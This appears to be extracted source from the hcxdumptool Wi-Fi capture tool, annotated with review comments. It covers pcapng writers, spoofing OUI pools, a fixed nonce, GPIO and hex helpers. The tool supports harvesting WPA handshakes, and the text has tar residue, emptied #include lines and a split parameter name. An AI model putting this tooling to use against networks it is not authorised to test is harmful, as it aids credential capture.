/* Fixed 32-byte nonce constant. NOTE(review): the SHB writer in pcap.c
 * records a caller-supplied `anoncerandom`, so this constant looks like a
 * legacy value — confirm whether anything still uses it. */
static const uint8_t mynonce[] =
{
0x68, 0x20, 0x09, 0xe2, 0x1f, 0x0e, 0xbc, 0xe5,
0x62, 0xb9, 0x06, 0x5b, 0x54, 0x89, 0x79, 0x09,
0x9a, 0x65, 0x52, 0x86, 0xc0, 0x77, 0xea, 0x28,
0x2f, 0x6a, 0xaf, 0x13, 0x8e, 0x50, 0xcd, 0xb9
};
/* NOTE(review): refers to `anonce`, which is not declared here (the array
 * above is `mynonce`). The macro only fails when it is expanded, so it is a
 * latent compile error rather than a live one. */
#define ANONCE_SIZE sizeof(anonce)
static const uint8_t mac_broadcast[] =
{
0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};
static const uint8_t mac_null[] =
{
0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
/* 24-bit OUI values, one per int. Presumably the pool from which the tool's
 * own access-point MAC prefix is chosen — confirm in hcxdumptool.c. */
static const int myvendorap[] =
{
0x00006c, 0x000101, 0x00054f, 0x000578, 0x000b18, 0x000bf4, 0x000c53, 0x000d58,
0x000da7, 0x000dc2, 0x000df2, 0x000e17, 0x000e22, 0x000e2a, 0x000eef, 0x000f09,
0x0016b4, 0x001761, 0x001825, 0x002067, 0x00221c, 0x0022f1, 0x00234a, 0x00238c,
0x0023f7, 0x002419, 0x0024fb, 0x00259d, 0x0025df, 0x00269f, 0x005047, 0x005079,
0x0050c7, 0x0084ed, 0x0086a0, 0x00a054, 0x00a085, 0x00bb3a, 0x00cb00, 0x0418b6,
0x0c8112, 0x100000, 0x10ae60, 0x10b713,
0x1100aa, 0x111111, 0x140708, 0x146e0a, 0x18421d, 0x1cf4ca, 0x205b2a, 0x20d160,
0x24336c, 0x24bf74, 0x28ef01, 0x3cb87a, 0x487604, 0x48f317, 0x50e14a, 0x544e45,
0x580943, 0x586ed6, 0x5c6b4f, 0x609620, 0x68e166, 0x706f81, 0x78f944, 0x7ce4aa,
0x8c8401, 0x8ce748, 0x906f18, 0x980ee4, 0x9c93e4, 0xa468bc
};
/* NOTE: sizeof() of an int array is a byte count, not an element count —
 * callers must divide by sizeof(int) to iterate the table. */
#define MYVENDORAP_SIZE sizeof(myvendorap)
/* OUI pool for the station side (same byte-count caveat as above). */
static const int myvendorsta[] =
{
0xa4a6a9, 0xacde48, 0xb025aa, 0xb0ece1, 0xb0febd, 0xb4e1eb, 0xc02250, 0xc8aacc,
0xd85dfb, 0xdc7014, 0xe00db9, 0xe0cb1d, 0xe80410, 0xf04f7c, 0xf0a225, 0xfcc233
};
#define MYVENDORSTA_SIZE sizeof(myvendorsta)
/*===========================================================================*/
/* --- archive member header (tar residue from the page extraction, not C) --- */
hcxdumptool-5.1.7/include/pcap.c000066400000000000000000000136441350370021700166100ustar00rootroot00000000000000
#define _GNU_SOURCE
/* The <...> header names of the following directives were lost in the page
 * extraction; only the bare #include tokens survived. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "pcap.h"
/*===========================================================================*/
/* Write one pcapng option (code, length, value padded to a 32-bit boundary)
 * at `shb` and return the number of bytes consumed (4-byte header + value +
 * padding). `option` may be NULL when optionlen is 0 (SHB_EOC); memcpy with a
 * NULL source and length 0 is technically undefined but benign in practice.
 * NOTE(review): no bounds check on the destination — every caller relies on
 * its 1024-byte stack buffer being large enough for all options it appends.
 * The hard-coded 4 is the real header size; OH_SIZE in pcap.h is 5 because
 * sizeof() counts the option_data[1] placeholder, so do not substitute it. */
uint16_t addoption(uint8_t *shb, uint16_t optioncode, uint16_t optionlen, char *option)
{
uint16_t padding;
option_header_t *optionhdr;

optionhdr = (option_header_t*)shb;
optionhdr->option_code = optioncode;
optionhdr->option_length = optionlen;
/* bytes needed to reach the next multiple of 4 (0 when already aligned) */
padding = (4 -(optionlen %4)) %4;
memset(optionhdr->option_data, 0, optionlen +padding);
memcpy(optionhdr->option_data, option, optionlen);
return optionlen + padding +4;
}
/*===========================================================================*/
/* Write an Interface Statistics Block for interface `interfaceid` to fd.
 * `starttimestamp` and the current time (microseconds since the epoch) go
 * into the starttime/endtime options; `incomming` is reported as received,
 * filter-accepted and user-delivered count, while the drop counters are
 * written as 0 (the tool does not track drops here). Returns false and
 * closes fd on a short write, so the caller must not close fd again.
 * The block is exactly ISB_SIZE (112) bytes and every field is assigned
 * below, so the short memset of the 1024-byte buffer (256 bytes) is harmless. */
bool writeisb(int fd, uint32_t interfaceid, uint64_t starttimestamp, uint64_t incomming)
{
int written;
struct timeval tvend;
uint64_t endtimestamp;
interface_statistics_block_t *isbhdr;
uint8_t isb[1024];

memset(&isb, 0, 256);
isbhdr = (interface_statistics_block_t*)isb;
/* ISBID is defined with a trailing ';' in pcap.h; harmless in an assignment */
isbhdr->block_type = ISBID;
isbhdr->total_length = ISB_SIZE;
isbhdr->interface_id = interfaceid;
gettimeofday(&tvend, NULL);
endtimestamp = ((uint64_t)tvend.tv_sec * 1000000) + tvend.tv_usec;
/* pcapng splits the 64-bit timestamp into high and low 32-bit words */
isbhdr->timestamp_high = endtimestamp
>> 32;
isbhdr->timestamp_low = (uint32_t)endtimestamp &0xffffffff;
isbhdr->code_starttime = ISB_STARTTIME;
isbhdr->starttime_len = 8;
isbhdr->starttime_timestamp_high = starttimestamp >> 32;
isbhdr->starttime_timestamp_low = (uint32_t)starttimestamp &0xffffffff;
isbhdr->code_endtime = ISB_ENDTIME;
isbhdr->endtime_len = 8;
isbhdr->endtime_timestamp_high = endtimestamp >> 32;
isbhdr->endtime_timestamp_low = (uint32_t)endtimestamp &0xffffffff;
isbhdr->code_recv = ISB_IFRECV;
isbhdr->recv_len = 8;
isbhdr->recv = incomming;
/* drop counters are not tracked by this writer; reported as 0 */
isbhdr->code_ifdrop = ISB_IFDROP;
isbhdr->ifdrop_len = 8;
isbhdr->ifdrop = 0;
isbhdr->code_filteraccept = ISB_FILTERACCEPT;
isbhdr->filteraccept_len = 8;
isbhdr->filteraccept = incomming;
isbhdr->code_osdrop = ISB_OSDROP;
isbhdr->osdrop_len = 8;
isbhdr->osdrop = 0;
isbhdr->code_usredliv = ISB_USRDELIV;
isbhdr->usredliv_len = 8;
isbhdr->usredliv = incomming;
/* end-of-options marker, then the trailing duplicate of total_length */
isbhdr->code_eoo = 0;
isbhdr->eoo_len = 0;
isbhdr->total_length_dup = ISB_SIZE;
written = write(fd, &isb, ISB_SIZE);
if(written != ISB_SIZE)
	{
	close(fd);
	return false;
	}
return true;
}
/*===========================================================================*/
/* Write an Interface Description Block to fd: link type radiotap
 * (DLT_IEEE802_11_RADIO), snaplen PCAPNG_MAXSNAPLEN, an if_name option
 * holding `interfacestr`, and an if_MACaddr option that carries only the
 * first 3 bytes (OUI) of `macorig` with the device-specific half zeroed —
 * so the capture file does not record the full hardware address.
 * Returns false and closes fd on a short write.
 * NOTE(review): strlen(interfacestr) is passed unbounded into the 1024-byte
 * stack buffer; presumably the string is an interface name (IFNAMSIZ-bounded
 * elsewhere in this tree), which is far below the limit — confirm at the
 * call site. */
bool writeidb(int fd, uint8_t *macorig, char *interfacestr)
{
int idblen;
int written;
interface_description_block_t *idbhdr;
total_length_t *totallenght;
char vendor[6];
uint8_t idb[1024];

memset(&idb, 0, 256);
idblen = IDB_SIZE;
idbhdr = (interface_description_block_t*)idb;
idbhdr->block_type = IDBID;
idbhdr->linktype = DLT_IEEE802_11_RADIO;
idbhdr->reserved = 0;
idbhdr->snaplen = PCAPNG_MAXSNAPLEN;
idblen += addoption(idb +idblen, IF_NAME, strlen(interfacestr), interfacestr);
/* keep only the 3-byte OUI of the interface MAC */
memset(&vendor, 0, 6);
memcpy(&vendor, macorig, 3);
idblen += addoption(idb +idblen, IF_MACADDR, 6, vendor);
idblen += addoption(idb +idblen, SHB_EOC, 0, NULL);
/* pcapng blocks end with a second copy of the total length */
totallenght = (total_length_t*)(idb +idblen);
idblen += TOTAL_SIZE;
idbhdr->total_length = idblen;
totallenght->total_length = idblen;
written = write(fd, &idb, idblen);
if(written != idblen)
	{
	close(fd);
	return false;
	}
return true;
}
/*===========================================================================*/
/* Write the pcapng Section Header Block to fd. Besides the standard
 * hardware/OS/application options (taken from uname(2) and VERSION) it
 * stores four tool-private options: the tool's own AP MAC, the replay
 * counter `rcrandom`, the 32-byte `anoncerandom` and the tool's station MAC
 * (OPTIONCODE_* in pcap.h). These presumably let the converter rebuild
 * handshakes later — they are part of the file header, so anyone holding the
 * capture can read them. Returns false and closes fd on a short write.
 * NOTE(review): the BIG_ENDIAN_HOST #ifdef below is dead code — the
 * unconditional assignment that follows overwrites byte_order_magic with
 * PCAPNGMAGICNUMBER regardless. Writing the constant in host byte order is
 * what lets readers detect the endianness, so the override is arguably the
 * right behaviour; the #ifdef should just be removed to avoid confusion.
 * The fixed 256-byte memset of the 1024-byte buffer is harmless because every
 * byte that is written out is assigned explicitly (addoption zero-fills its
 * padding). */
bool writeshb(int fd, uint8_t *macmyap, uint64_t rcrandom, uint8_t *anoncerandom, uint8_t *macmysta)
{
int shblen;
int written;
section_header_block_t *shbhdr;
optionfield64_t *of;
total_length_t *totallenght;
struct utsname unameData;
char sysinfo[256];
uint8_t shb[1024];

memset(&shb, 0, 256);
shblen = SHB_SIZE;
shbhdr = (section_header_block_t*)shb;
shbhdr->block_type = PCAPNGBLOCKTYPE;
#ifdef BIG_ENDIAN_HOST
shbhdr->byte_order_magic = PCAPNGMAGICNUMBERBE;
#else
shbhdr->byte_order_magic = PCAPNGMAGICNUMBER;
#endif
shbhdr->byte_order_magic = PCAPNGMAGICNUMBER;
shbhdr->major_version = PCAPNG_MAJOR_VER;
shbhdr->minor_version = PCAPNG_MINOR_VER;
/* -1: section length unknown (file is written incrementally) */
shbhdr->section_length = -1;
if(uname(&unameData) == 0)
	{
	shblen += addoption(shb +shblen, SHB_HARDWARE, strlen(unameData.machine), unameData.machine);
	/* utsname members are small fixed-size arrays (65 bytes each on Linux), so
	 * "%s %s" fits the 256-byte sysinfo buffer there — confirm for other libcs */
	sprintf(sysinfo, "%s %s", unameData.sysname, unameData.release);
	shblen += addoption(shb +shblen, SHB_OS, strlen(sysinfo), sysinfo);
	sprintf(sysinfo, "hcxdumptool %s", VERSION);
	shblen += addoption(shb +shblen, SHB_USER_APPL, strlen(sysinfo), sysinfo);
	}
shblen += addoption(shb +shblen, OPTIONCODE_MACMYAP, 6, (char*)macmyap);
/* 64-bit option written directly; 12 = 4-byte option header + 8-byte value
 * (OPTIONFIELD64_SIZE in pcap.h is unusable: it names a member that does
 * not exist) */
of = (optionfield64_t*)(shb +shblen);
of->option_code = OPTIONCODE_RC;
of->option_length = 8;
of->option_value = rcrandom;
shblen += 12;
shblen += addoption(shb +shblen, OPTIONCODE_ANONCE, 32, (char*)anoncerandom);
shblen += addoption(shb +shblen, OPTIONCODE_MACMYSTA, 6, (char*)macmysta);
shblen += addoption(shb +shblen, SHB_EOC, 0, NULL);
totallenght = (total_length_t*)(shb +shblen);
shblen += TOTAL_SIZE;
shbhdr->total_length = shblen;
totallenght->total_length = shblen;
written = write(fd, &shb, shblen);
if(written != shblen)
	{
	close(fd);
	return false;
	}
return true;
}
/*===========================================================================*/
/* Create a new pcapng dump file and write its SHB and IDB.
 * Returns the open file descriptor, or -1 if the file could not be created
 * or a header write failed (the write helpers close fd themselves in that
 * case, so -1 is returned without a second close). */
int hcxcreatepcapngdump(char *pc apngdumpname, uint8_t *macorig, char *interfacestr, uint8_t
*macmyap, uint64_t rcrandom, uint8_t *anoncerandom, uint8_t *macmysta)
{
int c;
int fd;
struct stat statinfo;
char newpcapngoutname[PATH_MAX +2];

c = 0;
/* NOTE(review): unbounded copy into a PATH_MAX+2 buffer. The name presumably
 * comes from the command line; a longer argument overflows the stack here.
 * snprintf(newpcapngoutname, sizeof(newpcapngoutname), "%s", pcapngdumpname)
 * (plus a length check) would make this safe. */
strcpy(newpcapngoutname, pcapngdumpname);
/* pick "<name>", "<name>-0", "<name>-1", ... — the first one that does not exist */
while(stat(newpcapngoutname, &statinfo) == 0)
	{
	snprintf(newpcapngoutname, PATH_MAX, "%s-%d", pcapngdumpname, c);
	c++;
	}
/* NOTE(review): umask(0) is a process-wide, permanent side effect — every
 * file this process creates afterwards gets exactly the requested mode. With
 * 0644 the capture is world-readable regardless of the user's umask. */
umask(0);
/* NOTE(review): the stat() loop and this open() are not atomic: a file (or a
 * symlink) placed at the chosen path in between is opened and written to
 * instead of a fresh file. O_CREAT | O_EXCL makes creation fail in that
 * case and closes the window; the loop could then retry on EEXIST. */
fd = open(newpcapngoutname, O_WRONLY | O_CREAT, 0644);
if(fd == -1)
	{
	return -1;
	}
if(writeshb(fd, macmyap, rcrandom, anoncerandom, macmysta) == false)
	{
	return -1;
	}
if(writeidb(fd, macorig, interfacestr) == false)
	{
	return -1;
	}
return fd;
}
/*===========================================================================*/
/* --- archive member header (tar residue from the page extraction, not C) --- */
hcxdumptool-5.1.7/include/pcap.h000066400000000000000000000174421350370021700166150ustar00rootroot00000000000000
/* classic pcap magic (native and byte-swapped) */
#define PCAPMAGICNUMBER 0xa1b2c3d4
#define PCAPMAGICNUMBERBE 0xd4c3b2a1
/* pcapng: SHB block type and byte-order magic (native and byte-swapped) */
#define PCAPNGBLOCKTYPE 0x0a0d0d0a
#define PCAPNGMAGICNUMBER 0x1a2b3c4d
#define PCAPNGMAGICNUMBERBE 0x4d3c2b1a
#define PCAPNG_MAJOR_VER 1
#define PCAPNG_MINOR_VER 0
#define PCAPNG_MAXSNAPLEN 0xffff
/* tool-private SHB option codes written by writeshb() in pcap.c */
#define OPTIONCODE_MACMYAP 62107
#define OPTIONCODE_RC 62108
#define OPTIONCODE_ANONCE 62109
#define OPTIONCODE_MACMYSTA 62110
/*===========================================================================*/
/* Section Header Block (SHB) - ID 0x0A0D0D0A */
struct section_header_block_s
{
	uint32_t block_type; /* block type */
	uint32_t total_length; /* block length */
	uint32_t byte_order_magic; /* byte order magic - indicates swapped data */
	uint16_t major_version; /* major version of pcapng (1 atm) */
	uint16_t minor_version; /* minor version of pcapng (0 atm) */
	int64_t section_length; /* length of section - can be -1 (parsing necessary) */
} __attribute__((__packed__));
typedef struct section_header_block_s section_header_block_t;
#define SHB_SIZE (sizeof(section_header_block_t))
/*===========================================================================*/
/* Header of all pcapng blocks */
struct block_header_s
{
	uint32_t block_type; /* block type */
	uint32_t total_length; /* block length */
} __attribute__((__packed__));
typedef struct block_header_s block_header_t;
#define BH_SIZE (sizeof(block_header_t))
/*===========================================================================*/
/* total length - every pcapng block ends with a second copy of its length */
struct total_length_s
{
	uint32_t total_length;
} __attribute__((__packed__));
typedef struct total_length_s total_length_t;
#define TOTAL_SIZE (sizeof(total_length_t))
/*===========================================================================*/
/* Header of all pcapng options. The SHB_* / IF_* option codes live here.
 * NOTE(review): OH_SIZE uses sizeof(), which counts the option_data[1]
 * placeholder (5 bytes); the real option header is 4 bytes, which is why
 * addoption() in pcap.c hard-codes 4 instead of using this macro. */
struct option_header_s
{
#define SHB_EOC 0
#define SHB_COMMENT 1
#define SHB_HARDWARE 2
#define SHB_OS 3
#define SHB_USER_APPL 4
#define IF_NAME 2
#define IF_DESCRIPTION 3
#define IF_MACADDR 6
#define IF_TZONE 10
	uint16_t option_code; /* option code - depending of block (0 - end of opts, 1 - comment are in common) */
	uint16_t option_length; /* option length - length of option in bytes (will be padded to 32bit) */
	char option_data[1];
} __attribute__((__packed__));
typedef struct option_header_s option_header_t;
#define OH_SIZE (sizeof(option_header_t))
/*===========================================================================*/
/* Option Field: option header followed directly by a 64-bit value (12 bytes).
 * NOTE(review): OPTIONFIELD64_SIZE refers to a member `data` that this struct
 * does not have, so expanding the macro is a compile error; pcap.c hard-codes
 * 12 instead. Either drop the macro or define it as sizeof(optionfield64_t). */
struct optionfield64_s
{
	uint16_t option_code;
	uint16_t option_length;
	uint64_t option_value;
} __attribute__((__packed__));
typedef struct optionfield64_s optionfield64_t;
#define OPTIONFIELD64_SIZE offsetof(optionfield64_t, data)
/*===========================================================================*/
/* Interface Description Block (IDB) - ID 0x00000001 */
/* NOTE(review): IDBID (like ISBID and EPBBID below) is defined with a trailing
 * ';'. That works in `x = IDBID;` but breaks inside an expression such as
 * `if(type == IDBID)`; the semicolon should be removed. */
struct interface_description_block_s
{
	uint32_t block_type; /* block type */
#define IDBID 0x00000001;
	uint32_t total_length; /* block length */
	uint16_t linktype; /* the link layer type (was -network- in classic pcap global header) */
#define DLT_IEEE802_11_RADIO 127
	uint16_t reserved; /* 2 bytes of reserved data */
	uint32_t snaplen; /* maximum number of bytes dumped from each packet (was -snaplen- in classic pcap global header
*/
} __attribute__((__packed__));
typedef struct interface_description_block_s interface_description_block_t;
#define IDB_SIZE (sizeof(interface_description_block_t))
/*===========================================================================*/
/* Packet Block (PB) - ID 0x00000002 (OBSOLETE - EPB should be used instead) */
struct packet_block_s
{
	uint32_t block_type; /* block type */
	uint32_t total_length; /* block length */
	uint16_t interface_id; /* the interface the packet was captured from - identified by interface description block in current section */
	uint16_t drops_count; /* packet dropped by IF and OS since prior packet */
	uint32_t timestamp_high; /* high bytes of timestamp */
	uint32_t timestamp_low; /* low bytes of timestamp */
	uint32_t cap_len; /* length of packet in the capture file (was -incl_len- in classic pcap packet header) */
	uint32_t org_len; /* length of packet when transmitted (was -orig_len- in classic pcap packet header) */
} __attribute__((__packed__));
typedef struct packet_block_s packet_block_t;
#define PB_SIZE (sizeof(packet_block_t))
/*===========================================================================*/
/* Simple Packet Block (SPB) - ID 0x00000003 */
struct simple_packet_block_s
{
	uint32_t block_type; /* block type */
	uint32_t total_length; /* block length */
	uint32_t original_len; /* length of packet when transmitted (was -orig_len- in classic pcap packet header) */
} __attribute__((__packed__));
typedef struct simple_packet_block_s simple_packet_block_t;
#define SPB_SIZE (sizeof(simple_packet_block_t))
/*===========================================================================*/
/* Name Resolution Block (NRB) - ID 0x00000004 */
/* Only the block header and the first record header are modelled; the record
 * value and further records follow on the wire. */
struct name_resolution_block_s
{
	uint32_t block_type; /* block type */
	uint32_t total_length; /* block length */
	uint16_t record_type; /* type of record (ipv4 / ipv6) */
	uint16_t record_length; /* length of record value */
} __attribute__((__packed__));
typedef struct name_resolution_block_s
name_resolution_block_t;
#define NRB_SIZE (sizeof(name_resolution_block_t))
/*===========================================================================*/
/* Interface Statistics Block - ID 0x00000005 */
/* Unlike the generic option header, the ISB options are laid out as fixed
 * members in the exact order writeisb() (pcap.c) fills them: start time,
 * end time, received, if-dropped, filter-accepted, os-dropped, user-delivered,
 * end-of-options, trailing length. ISB_SIZE is therefore the whole block
 * (112 bytes), not just its header. See the note on the trailing ';' in the
 * ISBID define at IDBID above. */
struct interface_statistics_block_s
{
	uint32_t block_type; /* block type */
#define ISBID 0x00000005;
	uint32_t total_length; /* block length */
	uint32_t interface_id; /* the interface the stats refer to - identified by interface description block in current section */
	uint32_t timestamp_high; /* high bytes of timestamp */
	uint32_t timestamp_low; /* low bytes of timestamp */
#define ISB_STARTTIME 2
#define ISB_ENDTIME 3
#define ISB_IFRECV 4
#define ISB_IFDROP 5
#define ISB_FILTERACCEPT 6
#define ISB_OSDROP 7
#define ISB_USRDELIV 8
	uint16_t code_starttime;
	uint16_t starttime_len;
	uint32_t starttime_timestamp_high; /* high bytes of timestamp */
	uint32_t starttime_timestamp_low; /* low bytes of timestamp */
	uint16_t code_endtime;
	uint16_t endtime_len;
	uint32_t endtime_timestamp_high; /* high bytes of timestamp */
	uint32_t endtime_timestamp_low; /* low bytes of timestamp */
	uint16_t code_recv;
	uint16_t recv_len;
	uint64_t recv;
	uint16_t code_ifdrop;
	uint16_t ifdrop_len;
	uint64_t ifdrop;
	uint16_t code_filteraccept;
	uint16_t filteraccept_len;
	uint64_t filteraccept;
	uint16_t code_osdrop;
	uint16_t osdrop_len;
	uint64_t osdrop;
	uint16_t code_usredliv;
	uint16_t usredliv_len;
	uint64_t usredliv;
	uint16_t code_eoo;
	uint16_t eoo_len;
	uint32_t total_length_dup; /* block length */
} __attribute__((__packed__));
typedef struct interface_statistics_block_s interface_statistics_block_t;
#define ISB_SIZE (sizeof(interface_statistics_block_t))
/*===========================================================================*/
/* Enhanced Packet Block (EPB) - ID 0x00000006 */
/* Header only; packet data, padding, options and the trailing length follow.
 * EPBBID carries the same stray ';' as IDBID. */
struct enhanced_packet_block_s
{
	uint32_t block_type; /* block type */
#define EPBBID 0x00000006;
	uint32_t total_length; /* block length */
	uint32_t interface_id; /* the interface the packet was captured from -
	identified by interface description block in current section */
	uint32_t timestamp_high; /* high bytes of timestamp */
	uint32_t timestamp_low; /* low bytes of timestamp */
	uint32_t cap_len; /* length of packet in the capture file (was -incl_len- in classic pcap packet header) */
	uint32_t org_len; /* length of packet when transmitted (was -orig_len- in classic pcap packet header) */
} __attribute__((__packed__));
typedef struct enhanced_packet_block_s enhanced_packet_block_t;
#define EPB_SIZE (sizeof(enhanced_packet_block_t))
/*===========================================================================*/
/* --- archive member header (tar residue from the page extraction, not C) --- */
hcxdumptool-5.1.7/include/rpigpio.h000066400000000000000000000007651350370021700173410ustar00rootroot00000000000000
/* Raspberry Pi GPIO register access via a memory-mapped peripheral window.
 * GPIO_PERI_BASE_OLD/NEW are the two peripheral base addresses this tool
 * knows; GPIO_BASE is the GPIO block offset within that window. The macros
 * expect a `gpio` pointer (declared below) to the mapped registers.
 * NOTE(review): PAGE_SIZE / BLOCK_SIZE are generic names that some libc
 * headers also define — redefinition warnings are possible depending on
 * include order. GET_GPIO(g) does not parenthesise `g` in `(1 << g)`, unlike
 * the other two macros; an expression argument would bind wrongly there. */
#define GPIO_DELAY 100000
#define GPIO_PERI_BASE_OLD 0x20000000
#define GPIO_PERI_BASE_NEW 0x3F000000
#define GPIO_BASE 0x200000
#define PAGE_SIZE (4*1024)
#define BLOCK_SIZE (4*1024)
#define INP_GPIO(g) *(gpio +((g) /10)) &= ~(7 << (((g) %10) *3))
#define OUT_GPIO(g) *(gpio +((g) /10)) |= (1 << (((g) %10) *3))
#define GPIO_SET *(gpio +7)
#define GPIO_CLR *(gpio +10)
#define GET_GPIO(g) (*(gpio +13) & (1 << g))
/* file-scope state; being `static` in a header, each translation unit that
 * includes this file gets its own private copy */
static int rpirevision;
static void *gpio_map;
static volatile unsigned *gpio;
/* --- archive member header (tar residue from the page extraction, not C) --- */
hcxdumptool-5.1.7/include/strings.c000066400000000000000000000037451350370021700173550ustar00rootroot00000000000000
/*===========================================================================*/
/* Return true if all `len` bytes of `buffer` are printable ASCII
 * (0x20..0x7e inclusive); an empty or negative len yields true.
 * NOTE(review): the loop counter is a uint8_t while len is an int. For
 * len > 255 the counter wraps from 255 to 0 before it can reach len and the
 * loop never terminates; it is only safe because callers presumably pass
 * 802.11 element lengths (at most 255). Declaring `p` as int removes the
 * hazard. */
bool isasciistring(int len, uint8_t *buffer)
{
uint8_t p;

for(p = 0; p < len; p++)
	{
	if((buffer[p] < 0x20) || (buffer[p] > 0x7e))
		{
		return false;
		}
	}
return true;
}
/*===========================================================================*/
/* Return true if the first `len` characters of `str` are all hex digits
 * (0-9, A-F, a-f). A NUL terminator fails the `< '0'` test, so a string
 * shorter than `len` is rejected rather than read past its end. Note that the
 * function checks exactly `len` characters, whatever `len` means to the
 * caller — see hex2bin(), which passes a byte count. */
bool ishexvalue(const char *str, size_t len)
{
size_t c;

for(c = 0; c < len; c++)
	{
	if(str[c] < '0')
		{
		return false;
		}
	if(str[c] > 'f')
		{
		return false;
		}
	if((str[c] > '9') && (str[c] < 'A'))
		{
		return false;
		}
	if((str[c] > 'F') && (str[c] < 'a'))
		{
		return false;
		}
	}
return true;
}
/*===========================================================================*/
/* Decode up to `blen` bytes of hex from `str` into `bytes` (zero-filled
 * first). Returns false if the first `blen` characters are not hex digits.
 * The lookup index is (c & 0x1F) ^ 0x10, which maps '0'-'9' to 0-9 and both
 * 'A'-'F' and 'a'-'f' to 17-22; it never exceeds 31, so only the first four
 * rows of the table below are ever read (the lower-case row is unreachable
 * but harmless).
 * NOTE(review):
 *  - only `blen` characters are validated, but 2*blen are consumed; a
 *    non-hex character in the second half is silently decoded via the
 *    table's zero entries. Passing blen*2 to ishexvalue() would close that.
 *  - `pos` is a uint8_t; with blen >= 128 and a long enough string the
 *    loop bound blen*2 exceeds 255 and pos wraps to 0 — an endless loop.
 *    Declaring `pos` as size_t fixes it.
 *  - str[pos+1] may be the NUL terminator for odd-length input; it is in
 *    bounds and decodes to 0. */
bool hex2bin(const char *str, uint8_t *bytes, size_t blen)
{
uint8_t pos;
uint8_t idx0;
uint8_t idx1;
uint8_t hashmap[] =
{
0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, // 01234567
0x08, 0x09, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // 89:;<=>?
0x00, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x00, // @ABCDEFG
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // HIJKLMNO
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // PQRSTUVW
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // XYZ[\]^_
0x00, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x00, // `abcdefg
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // hijklmno
};

if(ishexvalue(str, blen) == false)
	{
	return false;
	}
memset(bytes, 0, blen);
for (pos = 0; ((pos < (blen*2)) && (pos < strlen(str))); pos += 2)
	{
	idx0 = ((uint8_t)str[pos+0] & 0x1F) ^ 0x10;
	idx1 = ((uint8_t)str[pos+1] & 0x1F) ^ 0x10;
	bytes[pos/2] = (uint8_t)(hashmap[idx0] << 4) | hashmap[idx1];
	};
return true;
}
/*===========================================================================*/
/* If `str` has the form "$HEX[<hex digits>]" with an even total length,
 * return the number of bytes the hex part decodes to; otherwise 0. Note
 * "$HEX[]" also yields 0 and is therefore indistinguishable from "no prefix".
 * NOTE(review): memcmp() compares 5 bytes without regard to the terminator,
 * so a string shorter than 5 characters is read past its end (and an empty
 * string would additionally index str[-1] if the prefix matched). Using
 * strncmp(str, hexid, 5) — or checking len >= 6 first — avoids both. */
size_t ishexify(const char *str)
{
char *hexid = "$HEX[";
size_t len;

len = strlen(str);
if((memcmp(str, hexid, 5) == 0) && (str[len -1] == ']') && (len % 2 == 0))
	{
	/* strip "$HEX[" (5) and "]" (1), two hex digits per byte */
	return (len -6)/2;
	}
return 0;
}
/*===========================================================================*/
/* --- archive member header (tar residue from the page extraction, not C) --- */
hcxdumptool-5.1.7/include/version.h000066400000000000000000000000641350370021700173510ustar00rootroot00000000000000
#define VERSION "5.1.7"
#define VERSION_JAHR "2019"
/* --- archive member header (tar residue from the page extraction, not C) --- */
hcxdumptool-5.1.7/include/wireless-lite.h000066400000000000000000000026571350370021700204600ustar00rootroot00000000000000
#ifndef WIRELESS_LITE_H
#define WIRELESS_LITE_H
/* cleaned up from linux/wireless.h */
/* the <...> header name of this directive was lost in the page extraction */
#include
/* wireless-extensions ioctl numbers and flag values used by this tool */
#define SIOCGIWNAME 0x8b01
#define SIOCSIWFREQ 0x8b04
#define SIOCGIWFREQ 0x8b05
#define SIOCSIWMODE 0x8b06
#define SIOCGIWMODE 0x8b07
#define SIOCGIWTXPOW 0x8b27
#define IW_TXPOW_DBM 0x00
#define IW_FREQ_FIXED 0x01
#define IW_MODE_AUTO 0
#define
IW_MODE_ADHOC 1
#define IW_MODE_INFRA 2
#define IW_MODE_MASTER 3
#define IW_MODE_REPEAT 4
#define IW_MODE_SECOND 5
#define IW_MODE_MONITOR 6
#define IW_MODE_MESH 7
/* The structs below mirror the kernel's wireless-extensions ABI (see the file
 * comment above); their layout must match what the kernel ioctls expect, so
 * do not reorder or repack them. */
struct iw_quality
{
	unsigned char qual;
	unsigned char level;
	unsigned char noise;
	unsigned char updated;
};
struct iw_param
{
	int value;
	unsigned char fixed;
	unsigned char disabled;
	unsigned short flags;
};
struct iw_point
{
	void *pointer;
	unsigned short length;
	unsigned short flags;
};
struct iw_freq
{
	int m;
	short e;
	unsigned char i;
	unsigned char flags;
};
union iwreq_data
{
	char name[IFNAMSIZ];
	struct iw_point essid;
	struct iw_param nwid;
	struct iw_freq freq;
	struct iw_param sens;
	struct iw_param bitrate;
	struct iw_param txpower;
	struct iw_param rts;
	struct iw_param frag;
	unsigned mode;
	struct iw_param retry;
	struct iw_point encoding;
	struct iw_param power;
	struct iw_quality qual;
	struct sockaddr ap_addr;
	struct sockaddr addr;
	struct iw_param param;
	struct iw_point data;
};
/* ioctl request: interface name plus the request-specific union */
struct iwreq
{
	union
	{
		char ifrn_name[IFNAMSIZ];
	} ifr_ifrn;
	union iwreq_data u;
};
#endif
/* --- archive member headers (tar residue from the page extraction, not C) --- */
hcxdumptool-5.1.7/jni/000077500000000000000000000000001350370021700146505ustar00rootroot00000000000000hcxdumptool-5.1.7/jni/Application.mk000066400000000000000000000000731350370021700174440ustar00rootroot00000000000000
APP_PLATFORM := android-21
APP_BUILD_SCRIPT := Android.mk
/* --- archive member header (tar residue from the page extraction, not C) --- */
hcxdumptool-5.1.7/license.txt000066400000000000000000000020711350370021700162530ustar00rootroot00000000000000
The MIT License (MIT)

Copyright (c) 2000-2019 ZeroBeat

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
